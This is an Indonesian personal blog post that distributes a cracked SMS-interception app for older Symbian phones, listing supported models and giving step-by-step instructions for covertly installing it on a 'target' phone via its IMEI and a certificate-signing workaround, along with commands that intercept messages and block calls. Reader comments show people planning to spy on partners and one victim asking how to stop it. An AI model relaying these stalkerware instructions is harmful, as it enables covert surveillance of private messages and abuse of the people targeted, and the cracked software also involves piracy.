bannerBlog ini milik seorang pria gendut yang mencoba untuk berbagi ilmu dan pengalaman melalui tulisan.

Saya hanya seorang lelaki yang sebenarnya tidak suka menulis, tetapi melalui blog ini saya mencoba berbagi melalui tulisan saya. Dari materi pembelajaran formal di sekolah dan kuliah hingga curhatan sehari-hari, saya coba sajikan dalam blog ini tentu dengan tujuan berbagi informasi dan wawasan. Selengkapnya...
Dec
4th

sms spy – aplikasi penyadap sms (cracked)

Author: mastermime | Files under Gadget

Sesuai judul, saya mau share aplikasi untuk menyadap SMS – cracked, dari juragan anakjayapura07

HP yang support : SYMBIAN 9v3 dan v5
Nokia 3250, 5230, 5320 XpressMusic, 5500 Sport, 5530 XpressMusic, 5630 Xpress Music, 5700 XpressMusic, 5730 XpressMusic, 5800 XpressMusic, 6110 Navigator, 6120 classic, 6121 classic, 6122c, 6124 classic, 6210 Navigator, 6220 Classic, 6290, 6650 Fold, 6720 Classic, 6730 classic, 6790 Mako,Surge, E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E90, N71, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, N97 Mini, X6
Samsung GT i7110, GT i8510 Innov8, GT i8910 Omnia, SGH G810, SGH i450, SGH i550, SGH i560, SGH L870
Sony-Ericsson G700, G900, M600, P1i, P990, U1 Satio, W950, W958, W960
LG KS10 Joy, KT610
Motorola RIZR Z10, RIZR Z8

Installernya bisa didownload disini

Manual instalasi silahkan sedot disini

Sign tools silahkan didownload disini

Cara pakai :
1. Bro/sis harus tau IMEI target (IMEI HP yang mau dipasang aplikasi ini). Caranya, dari HP target, tekan *#06#, lalu akan muncul 15 digit angka, itulah imei target.
2. Silahkan catat dan registrasikan disini untuk mendapatkan .cer dan .key file. Untuk yang belum punya account, silahkan daftar saja.GRATIS kok. Tunggu 4-6 jam kemudian, lalu login kembali ke TKP, anda akan mendapatkan .cer dan .key nya
3. Sign .cer dan .key yang sudah diperoleh dengan menggunakan sign tools. Aplikasi siap digunakan
4. Lanjutkan dengan menginstall di HP target dengan mengikuti manual yang sudah bro/sis download

Perintah tambahan selain yang dimanual :
* Off : Untuk menghentikan sementara penyadapan
* On : Untuk menghidupkan kembali penyadapan
* Add sender +62818xxxxxx,+62811xxxxxx : Untuk menyadap aktifitas sms dari dan ke nomer tertentu saja
* Add : Untuk kembali menyadap semua nomer
* Block on : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap
* Block off : Untuk mematikan blokir telpon diatas (defaultnya ini yang aktif)

Silahkan dicoba, diresapi, dan dinikmati… :cool:

Related Posts Plugin for WordPress, Blogger...
Share and Enjoy:
  • Print
  • StumbleUpon
  • Facebook
  • Twitter
  • Google Bookmarks
  • Add to favorites
  • Live
  • MySpace
  • RSS
  • email
  • Reddit
  • Tumblr

Users who found this page were searching for:

  • menyadap sms hp nokia 5130
  • aplikasi penyadap sms buat hp sembyan
  • aplikasi gratis n e63 untuk blokir telepon
  • spy sms untuk java
  • free download software penyadap ni hp
  • cara menyadap sms dan telepon dengan hp nokia 5130c
  • penyada android free
  • aplikasi sms tambahan untuk nokia 6120c
  • menyadap sms java
  • "spy sms"
  • penyadap sms hp free
  • apikasi sadap sms untuk samsung champ
  • aplikasi smspy
  • aplikasi penyadap sms hp java e72 2011
  • spy tool android keren
  • APLIKASI MENIMBULKAN KEMBALI SMS DI HP
  • software nokia gratis blokir sms
  • App cracked hp n70
  • aplikasi menyadap hp
  • Mengetahui sms di hp cina melalui nokia 5233

Comments

  1. yudi says:

    maaf gan, ane mau tanya..
    fitur ini bisa di pake untuk hp nokia 5130 xpressmusic gak?

    trims..

  2. ValMon says:

    sayang ga ada black berry.., kalo ada rpr bisa di…. :twisted:

    1. mastermime says:

      liat OSnya aja, mungkin bisa… :)

  3. dini says:

    ada aplikasi blokir sms untuk nokia C5 gag bro?gmn cara donlotnya

  4. kumbang says:

    ka ad apps bwt n-gage QD gk / apps bwt tampilan baru, thanks n lam cnal ka:)

    1. mastermime says:

      maaf ndak punya :(

  5. wid says:

    ada aplikasi spy buat samsung corby g gan?

  6. zulkifli says:

    bro,gw instal kok harus sertifikat dl,gmn caranya?

  7. rakaswara says:

    gmn reg imei nya gan…
    aq bingung..udah refristrasi..
    pake yang aply ato yang upload???

  8. gofur says:

    :mrgreen: mantap mantap,,,gua mau sadap pacar gua,,,,lagaknya agak mencurigakan,,,,wk,wk,wk,main ke blog gua boos,,,cari plugin jquery di sana ni linknya web design library

  9. roy says:

    minta tolong gan gimana cra menghentikan penyadapan sms untuk hp e63,.. soalnya ad teman kantor yang jail banget
    trus klosmsku masuk di baca d ruangan buat risih saja
    minta bantuannya gan,, help.. :cry: :cry:

  10. richard says:

    bro klok hp yg di sadap tu nexsian bisa g y?? :roll:

  11. rudolfo Sousa says:

    N81 Bisa ga’ gan?

  12. ari says:

    wah brati g bisa nyadap sms target sebulan yg lalu ya?
    masalahnya temen sendiri maling leptop gan,kerjasama dgn org. :evil:
    susah cari bukti… :cry:

    1. mastermime says:

      coba hubungi polisi dan provider yg bersangkutan

  13. jojo says:

    mas bro, aplikasi ini bisa buat samsung champato N 5130 xpress music g?
    makasih :grin:

  14. farich says:

    ad aplikasi knci sms gag?
    buat 5800

  15. nymphadora says:

    ponsel q blackberry gemini, sms bisa di sadap via email.
    segala aktivitas YM juga tersadap (sdh saya cb mengubah sandi dan mengalihkan email tambahan)
    bagaimana menghentikannya?

    mohon bantuannya kirim ke email saya. terimakasih :|

  16. halim says:

    hp sy samsung corby bisa tidak menyadap sms hp pacar at tmn sy yg pake hp bb

  17. Rudi HarYanto says:

    ko gx dpet2 ya .cer sma .key nya gmna sih cranya

  18. [...] Originally Posted by regan mau tanya nih sama teman-teman viva forum. bagaimana cara nya menyadap sms yang kita tuju ke hp kita, tanpa di ketahui sama orang yang kita lacak via internet….??? sebelumnya saya minta maaf, soalnya tadi saya baru di sadap sama orang semua info penting jadi tersebar, padahal bersifat pribadi. terima kasih Kayanya bisa dengan menggunakan aplikasi mobile sms monitor, tapi dengan catatan HP target dan HP Regan masuk list di bawah ini. Nokia 3250, 5230, 5320 XpressMusic, 5500 Sport, 5530 XpressMusic, 5630 Xpress Music, 5700 XpressMusic, 5730 XpressMusic, 5800 XpressMusic, 6110 Navigator, 6120 classic, 6121 classic, 6122c, 6124 classic, 6210 Navigator, 6220 Classic, 6290, 6650 Fold, 6720 Classic, 6730 classic, 6790 Mako,Surge, E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E90, N71, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, N97 Mini, X6 Samsung GT i7110, GT i8510 Innov8, GT i8910 Omnia, SGH G810, SGH i450, SGH i550, SGH i560, SGH L870 Sony-Ericsson G700, G900, M600, P1i, P990, U1 Satio, W950, W958, W960 LG KS10 Joy, KT610 Motorola RIZR Z10, RIZR Z8 jadi garis besarnya, hp target dan hp agan diinstall aplikasi ini, lengkapnya bisa di cek disini TKP [...]

  19. iendah says:

    ada g aplikasi buat 5130 yg apabila sms sdah dhpus smua tp bs tersimpan di recycle gto,

  20. Alfredo says:

    SignSisnya gak mau running, message: “the application failed to initialize properly” …… salahnya dimana?

    Thanks